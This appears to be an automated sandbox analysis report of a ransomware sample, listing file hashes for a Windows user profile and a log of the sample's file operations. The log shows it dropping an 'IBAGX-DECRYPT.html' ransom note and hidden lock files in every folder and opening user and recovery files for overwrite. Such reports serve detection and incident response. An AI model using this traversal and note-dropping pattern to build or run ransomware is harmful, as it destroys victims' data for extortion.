C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url 0.66 KB MD5: 964edd71f5e8132944d4ca011352a5ce
SHA1: 9b8a3c9e16c10178b721b07cc6403e9cdcc1ffa7
SHA256: 02d0d8952700d264e5c2d2f045466330153eeb9d18b34eb6ddfddc3e6544cb04
SSDeep: 12:SqOtVMtJVUPV7swliaNyajB148UO8aGlD6kp6AvsiqKb0nBNMb580C:gwtb4lXyROYl+koAvsiqKb0nQNK
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg 5.15 KB MD5: c1e1fcab20d7bd44d6d72131347f3c60
SHA1: 293030b9fd329952178621a7bbf2e75dd9fcf250
SHA256: eea85711929d0b7f4bfe57e04176a6f4faceb9f7e53fb481b25802c9b99de2a0
SSDeep: 96:hGa8d1THTKTDIt8MYwutwRrse2RpEAP47TqtYDTHBJuxe5ZthCjI+4RXFR2:h98jTzqD7MYVRpErKWDTtajIxr2
False
C:\Users\EEBsYm5\AppData\Roaming\41xTLbSy8hho.jpg 66.80 KB MD5: b31697b470f048e7a38b4ba63da7dbcf
SHA1: 0783308ae45ee96a12075495860b3ec4ed670b40
SHA256: 079c0aa865846e5059a8171690381bd14f6864f0f4f9a6f2b5ea5964563f2322
SSDeep: 1536:bq7yJw/Mm8idRSPzTvuhnglQ7BkfpM3LU9qyDl0NY:bwODifGEnaEst0NY
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg 5.52 KB MD5: 7ae6a28d22c40f09fb4e06c67ade9d42
SHA1: 127ccb4c3534845d1d0769039c3ad37b0a7c1219
SHA256: a833c9c8c60c9efce614f390f33c4bf6e9a5cdd4aa6f1cec5378d6e7a1b95d77
SSDeep: 96:HJDyYnZcMjK2vjdShq3olGW/tG0J0QXolQB57oAdmLtesmyKLZQCaI88k:HJhnKx2hSIo1/cy0QXoCYRpKLeCp88k
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore 2.02 MB MD5: 8d9715387a37982ff707e813b019340a
SHA1: 0c1113a839b265fa507710494f7dbf36d5c0b10a
SHA256: 102e5bc9c4273310511db779bf211f7add298d1c7a17a076f82676042c0e9a89
SSDeep: 24576:AhRk5Cl7e/ge9Y5ZLWX5W+KhdVpmXgZBF5aKsK2cBti9WCPTuT:AeCl77Nt6w55aKnIWETuT
False
C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt 12.43 KB MD5: 204bd85c5d5a4f4b30067734169a9160
SHA1: 1a7e257028c91b04f34dda4b1aad34231a3e61d4
SHA256: 7b714e635a095e1b658693ab91e4884236efe2cde5f2ed814956a2ac88284d6c
SSDeep: 192:1V6l/+f3ti5wb7wcjxFwlCcEl1VuH17eFJa2bo1pb9hQh/l8AVj:1Y9+ftswbscjx+rELVuIjZbo1pvQpOQj
False
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms 512.53 KB MD5: 0ca864764ea59ad67650cc9c58172d5b
SHA1: 1ff6954e5369386f488dc3ae7d7d306bb373a1f0
SHA256: f291bf29dde2fe376cb62f8c77754c75a326d38d3da4fd5cdc01c017a4b48a1c
SSDeep: 12288:W0r8kAYS+oQUPU0YyGyB0AkLg2lW7i9IKGURydp:WK8tYlU80YJPLE7irGUR2p
False
C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Settings.ini 0.61 KB MD5: 4635cdafdc6e74980c791aec3bb543db
SHA1: 367d620da7b1daacd3b2d10fee6e1b9e14e2ae97
SHA256: e47a989a468ce6d8ac7fb2364a61ef8a484f2de4d1b960e581f52f3570b25d78
SSDeep: 12:ALw0mFuazsukfZhEVyvQjrZTg2Ub5/aYoKBEK59FBW/1O+ooU++7BgC:ALVyubu2Z6q8TghVouEK59Fc/1uoU+i
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm 0.75 KB MD5: d0be0685c6415a2b8726dd0e02c9b08b
SHA1: 5353af159b943956eac2f89a3499267f40d60497
SHA256: e3b237e5a07d4ffd4c74a4d0ed717624d5efad3537aff005a0ad74c0de7b3b71
SSDeep: 12:YJ9baak8onyhg+0E662CMnfiSZtCH+4LvbFWgCwC:YJ9btkbnyh2OP+sIPJ
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat 32.53 KB MD5: 6d25d007f79e1b32d5063aaf34a5bd79
SHA1: f3b12233223c74d1e4c0baeab91f97897ee1d75c
SHA256: 2abe4bf5f4a7f49d294fe5302346f86b2fecc375bbb69637329f840887c1f859
SSDeep: 768:W3iTd2w2lxeUyxtQf0BB8mwnb0ptdE4EGl4nmP:W3iTd2wuixhwnb0jq4dl4nmP
False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl 1.44 KB MD5: bbd1023423e5973cf94b68d1f691212b
SHA1: b72e21129596b54d157be7337c063a44ab55ce33
SHA256: adcf93f66ba743486bd400817b9a81dafe52aa5dbd7325dbd938df4cd0fc3b56
SSDeep: 24:GE5pcSrRCo5H4ylxH4a1sp5psoQ1ymwdPpIQYsxeOzMR97PXp/tN//t9OoJtEdPZ:Pfco5YIxYa91ymwdOjs5zMRBxlB14IOH
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx 3.99 MB MD5: ef304750860074dfca21b97f76ad5d24
SHA1: 3cc6620133f46a212b8a9776382b0fc0c35cab71
SHA256: a2138977fffad2c4aabf46b62d9d5028a5f9e1f9bb7baff99070238560b4472f
SSDeep: 98304:T+BJn651h+s8aa8NHLBvUaylef22P5xGM0p:KE51h5XKaywz5czp
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\oeold.xml 0.78 KB MD5: 87d0679daf9dd12201706f6377521ba4
SHA1: 89eefc1f2127034b18d0829f800a38c3ba6daab7
SHA256: f12c53b705e0f3fa0e92803d214a872ad5d395ffcfba16cacd23e1e25c8e0e10
SSDeep: 24:aJjtCrVCY0TlZRQj/RdIXU1Zf2z1Pyl8l:aJ5CrIhnKzRdYUZOkI
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb00001.log 2.00 MB MD5: 129c9e124c4143a8de67919f43d79172
SHA1: 769296b7b61575411560016733efc64179ffed24
SHA256: aa7f16324adf732f55afb5e01f7437851a947ef5a2655a376ff1b18f4c62ae67
SSDeep: 49152:1ynDFTGvXDIkOodrwMXuqs6/assXHBDYZStH4Yg6:1q5QXD5tHXuqsFsApIG3
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.chk 8.53 KB MD5: 9ecfc5931a92f3f9942b8503a33bad15
SHA1: f333f5d0d0e9f5c1bfb9f66596a883e72e3bac06
SHA256: 9a89dab1740dfb9639fc8bd281c456fa4e626b221a743e7e72d11c1597c747b5
SSDeep: 192:oNUfYmGExmO9tZjWm0f6z96eaGjKf+5ZNHkJ4k5gSXWjvk:0GYDyrp50Cz8eHjDIJ41js
False
C:\Users\EEBsYm5\AppData\Roaming\0IDnC0H9EMmV.mp4 30.24 KB MD5: b3d4c8991947180a27a11b5fab3ac046
SHA1: 27b4521a49325c82c6296ecc8b99533bd15d4064
SHA256: 4e4e5e6d96fa53e5e29940712ef90a6ea288ef9ab4ba22b298fcc676510f9511
SSDeep: 768:9zGHHstAWE0veo/k7D5RetuJo/YUVOM3uAXWP:btLE0Go+1svQUb3uAXM
False
C:\Users\Default\Favorites\Windows Live\Get Windows Live.url 0.66 KB MD5: a45c6c54dfc4a3191c4c4b1143a99aea
SHA1: 1ec94b42d655d36852f34b1f548e122dce553807
SHA256: c30cb8b0676fae3b67be5ba1d455c1d937e2e62ac75c464a8448dc4c93113e0f
SSDeep: 12:qN0bCd1gzv3WbyH2NddCyvLmEoEasOkN7pw328dxQHNUAdwq1C:7Czs3oyWLdCyvSAaTkI32bHquM
False
C:\Users\EEBsYm5\AppData\Roaming\d9-2p9zLf4.pdf 37.41 KB MD5: db8e8a7fc6587329fd2fd21d376a96be
SHA1: 25506e96a4e6b76861735af3a8575e312be005db
SHA256: bfd963b2bd4a44d1585ac6ed62165c9d382723e48207b9da8ae83743779e2d63
SSDeep: 768:8YFmIFpevuLLoVZ26FsArd+1HCqSmFEoM+VG7OluYvQAIYeoqNvRmZQ:8YVFAvuAVZjyA0RCd7qaouYY6e7Nv0m
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat 16.53 KB MD5: 7b3bf4d1ee365be20279a24ff71f4fa4
SHA1: 9e49d881cbb08480411d3e18d1e1c9f90a41c13a
SHA256: a6a2c0ee170825aebb72a7a70eb6939bb8d30cd385d5472587dd40b53fe479a6
SSDeep: 384:0yc9u8Ar2E3pXnCqnsbkX8iszuKVM5tAeKfU1iJ6K0O:SU8GHnDXAzuKVQbKfUIJv0O
False
C:\Users\EEBsYm5\AppData\Roaming\du-5F19JYW5jR0wN.png 66.05 KB MD5: abee6d05cfd94261da2f80dd22be8197
SHA1: 1c5760a163d09e5aa405e0d1d46846a1e874976f
SHA256: 3f33558f9bd359cd93411ac666bb41762553a660de86657144929c8de39b19a2
SSDeep: 1536:e38gUDClglpRZ8+lNriAYZq1jmEajUTV95q0czvvLf/0KkXIZS:slUDVZDHi7ZqFtx+xlcIk
False
C:\Users\Default\Favorites\MSN Websites\MSN.url 0.66 KB MD5: 1aaf4cce89bb026ab2861aa8b79e0347
SHA1: d9c5bdb86e063cfda4be1fd300398c960ee9ddbe
SHA256: f99fea69d61b7e8b6810d47f722a244903254a1dcb07bd7ac2615405945795eb
SSDeep: 12:yIvbpzin+5GMGXxkE87YuNeKn91EuvrDQ/dTSD6r0BRZmI3Z5CYks2mk0C:yIvNzi3i17H/91vnwdTSmrIpp5CJsLkt
False
Host Behavior
File (2729)
»
Operation Filename Additional Information Success Count Logfile
Create C:\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\$Recycle.Bin\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\$Recycle.Bin\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-3785418085-2572485238-895829336-1000\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-3785418085-2572485238-895829336-1000\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\bootmgr desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\bootmgr desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Documents and Settings\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\MSOCache\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\MSOCache\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\PerfLogs\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\PerfLogs\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\PerfLogs\Admin\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\PerfLogs\Admin\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Program Files\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Program Files\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Program Files\Microsoft SQL Server Compact Edition\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Program Files\Microsoft SQL Server Compact Edition\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Recovery\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Recovery\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\boot.sdi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\Winre.wim desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\System Volume Information\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\System Volume Information\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
Create C:\Users\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Application Data\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Default\AppData\Local\Application Data\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
Create C:\Users\Default\AppData\Local\History\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\History\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Credentials\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Credentials\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\0TOZKA9V\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\0TOZKA9V\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\28NUQX6M\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\28NUQX6M\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\8S73DLQL\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\8S73DLQL\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\index.dat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\QVTV2WL1\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\QVTV2WL1\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\01_Music_auto_rated_at_5_stars.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\02_Music_added_in_the_last_month.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\03_Music_rated_at_4_or_5_stars.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\04_Music_played_in_the_last_month.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
